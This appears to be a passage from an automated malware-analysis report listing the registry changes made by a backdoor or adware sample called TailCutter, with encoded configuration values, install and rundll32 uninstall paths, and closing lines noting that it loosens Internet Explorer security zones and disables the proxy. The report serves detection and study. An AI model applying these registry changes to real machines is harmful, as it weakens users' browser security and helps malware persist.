[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "/P////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"bbf88800" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"27ddcf6f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"3c09c42b" = "///%"
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f0bf0bde" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"414bc593" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
"c6c5dd44" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
"72758a5d" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d1abcdb6" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c5705860" = "Vx////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"iiid" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB D9 BC F2 72 8D E9 64 75 E5 45 0A 51 D4 15 46"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svn" = "TailCutter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svi" = "0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"dlpath" = "c:\progra~1\tailcu~1\tailcu~1.dll"
"svx" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"0c230bcb" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"3efeb33e" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2e22d94e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.1" = "6t1JF1FHwysurpnikg"
"usr.0" = "oMUlaLmjlhabcdefAB"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"c6d15ff2" = "%Program Files%\TailCutter\TailCutter.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"uuid" = "12802899647634509424"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"a2e3b941" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"bbf88800" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Install_Dir" = "%Program Files%\TailCutter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svn" = "TailCutter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svi" = "0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1520c6f1" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svt" = "1431212851"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"InstallDate" = "20140510"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svpath" = "c:\Program Files\TailCutter\TailCutter.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svx" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"CategoryName" = "%SearchDefenderUpdaterKeys_CategoryName%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Mode" = "4026531840"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Version" = "22022131"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0c230bcb" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"date" = "1431212812"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"340d3099" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7367429f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svt" = "1431212851"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"LRTS" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Version" = "22022131"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all local (intranet) sites that are not listed in other zones:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled, so the browser connects directly:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all network (UNC) paths:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE security-zone settings so that the Local Intranet zone includes all sites that bypass the proxy server:
"ProxyBypass" = "1"
